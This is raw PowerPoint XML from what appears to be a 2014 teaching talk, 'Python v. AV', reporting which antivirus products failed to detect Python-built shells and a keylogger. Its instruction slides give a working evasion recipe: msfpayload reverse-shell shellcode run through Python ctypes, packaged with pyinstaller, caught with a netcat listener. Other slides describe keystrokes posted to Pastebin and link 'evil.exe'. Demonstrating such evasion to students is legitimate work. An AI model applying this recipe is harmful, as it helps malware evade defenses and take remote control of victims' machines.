          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky detects it as HEUR:Trojan.Win32.Generic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-23 at 4.46.32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777" y="3420343"/>
            <a:ext cx="5051777" cy="3296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9394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85800" y="1058333"/>
            <a:ext cx="7772400" cy="4191000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a delay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88598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" name="Picture 7" descr="norton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8111" y="373945"/>
            <a:ext cx="4064000" cy="622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2006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norton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7467" y="437445"/>
            <a:ext cx="4025900" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="norton1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7467" y="3616678"/>
            <a:ext cx="4038600" cy="308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9529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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO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7000" y="1193800"/>
            <a:ext cx="8890000" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>cp foo foo2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nano foo2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x=raw_input("Press Enter to continue")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile foo2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30549771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Norton, Avast, &amp; MSE Lose!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Screen Shot 2014-05-23 at 5.22.43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5778" y="1600200"/>
            <a:ext cx="6335889" cy="4973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9946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Kaspersky Wins!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Screen Shot 2014-05-23 at 5.19.08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494" y="1600200"/>
            <a:ext cx="7103505" cy="4783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316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85800" y="1058333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in two stages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no delay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88598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AV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Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Al these failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>360 Internet Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky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87236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Beginners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Textbook that covers the material</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Online training at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CodeCademy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DVDs with virtual machines ready to go</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hands-on projects with complete step-by-step instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lab time after each class with the instructor available to help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extensive open lab time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09126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Remember Mikko?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F-secure's Mikko Hyppönen_ Full talk from Wired 2012_2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4825" y="1600200"/>
            <a:ext cx="8135938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9999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F-Secure Wins!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Fsec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2667" y="1600200"/>
            <a:ext cx="6279444" cy="4989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4732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AV Challenge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6373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598333"/>
            <a:ext cx="8229600" cy="2527830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Posted April 3, 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No reply from AV vendors, but Norton improved its detection after that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now a delay is required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.34.13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71828"/>
            <a:ext cx="8229600" cy="779368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-24 at 7.34.25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00200"/>
            <a:ext cx="8353778" cy="1647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2375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85800" y="1058333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a delay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09160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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INSTRUCTIONS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7000" y="1193800"/>
            <a:ext cx="8890000" cy="5664200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On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>msfpayload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> LHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>192.168.119.252 C &gt; rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nano rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x=raw_input("Press Enter to continue")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ctypes import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18660341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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INSTRUCTIONS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93800"/>
            <a:ext cx="8229600" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller --onefile rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nc –lp 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42640389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Norton Loses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Screen Shot 2014-05-23 at 6.06.28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889" y="1600200"/>
            <a:ext cx="6505222" cy="4630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5301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Kaspersky Wins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Screen Shot 2014-05-23 at 6.07.47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111" y="2005486"/>
            <a:ext cx="7366000" cy="4013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9883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Advanced Malware Protection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30407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Average Students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Configure their own home machines to do the projects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Work at home, with no instructor available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple challenge projects without instructions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685000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503333"/>
            <a:ext cx="8229600" cy="62283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ty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ChrisAbdalla_1 from HP ESP TippingPoint</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.23.32 A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56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="791633" y="273050"/>
            <a:ext cx="6997700" cy="2238728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Screen Shot 2014-05-24 at 7.23.54 A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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="310445" y="2659239"/>
            <a:ext cx="8573911" cy="2667390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22706741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187222"/>
            <a:ext cx="8229600" cy="3938941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A friend in the financial industry tested Evil.exe on a system protected by FireEye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FireEye gives no alerts and lets it post keystrokes right to Pastebin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="log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2977" y="201259"/>
            <a:ext cx="5116690" cy="1486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725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Python Keylogger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86356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2844800" cy="2223029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google "Python Keylogger"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836333"/>
            <a:ext cx="2844800" cy="3289830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I used this one from 4 years ago</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.41.23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5999" y="599194"/>
            <a:ext cx="5475646" cy="5851525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15316375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Post Keystrokes to Pastebin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p9-ch1a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21"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="846665" y="1725070"/>
            <a:ext cx="7605889" cy="4649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8239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Problem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Pastebin busted me for making too many pastes in a 24-hour period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So I wrote my own Pastebin imitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34462286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Kaspersky &amp; Avast! LOSE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Screen Shot 2014-05-24 at 11.13.45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7445" y="1715123"/>
            <a:ext cx="6152444" cy="4691321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38891550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8778"/>
            <a:ext cx="8229600" cy="931333"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton WINS!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 descr="Screen Shot 2014-05-24 at 11.28.43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1555" y="1221171"/>
            <a:ext cx="6166556" cy="5411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1286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But just add a delay...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 descr="Screen Shot 2014-05-24 at 11.46.21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219" y="1304749"/>
            <a:ext cx="7613335" cy="5440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1205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222"/>
            <a:ext cx="8229600" cy="959556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure LOSES!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Screen Shot 2014-05-24 at 12.02.4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000" y="1417638"/>
            <a:ext cx="6533444" cy="5394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0372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Advanced Students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Advanced challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Online security puzzle sites </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cyber competitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Following the news, independent work on cutting-edge topics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77549347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PRODUCT ANNOUNCEMENT!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77655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8778"/>
            <a:ext cx="8229600" cy="917222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ultra-Advanced APT Tool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192889"/>
            <a:ext cx="8229600" cy="933274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/>
              <a:t>samsclass.info/evil.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 12.24.3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5911" y="1120422"/>
            <a:ext cx="5537200" cy="3684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7960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Screen Shot 2014-05-24 at 12.28.4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4556" y="633561"/>
            <a:ext cx="6152444" cy="6026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6549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UNSTOPPABLE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None of these products stop it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Security Essentials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64249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creen Shot 2014-06-06 at 9.45.01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6246" y="705596"/>
            <a:ext cx="5270500" cy="486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564912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creen Shot 2014-06-06 at 9.45.09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828" y="799675"/>
            <a:ext cx="7454900" cy="501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262218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illy-fenc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6520"/>
            <a:ext cx="9144000" cy="5996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1324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Independent Projects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Students can get extra credit by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
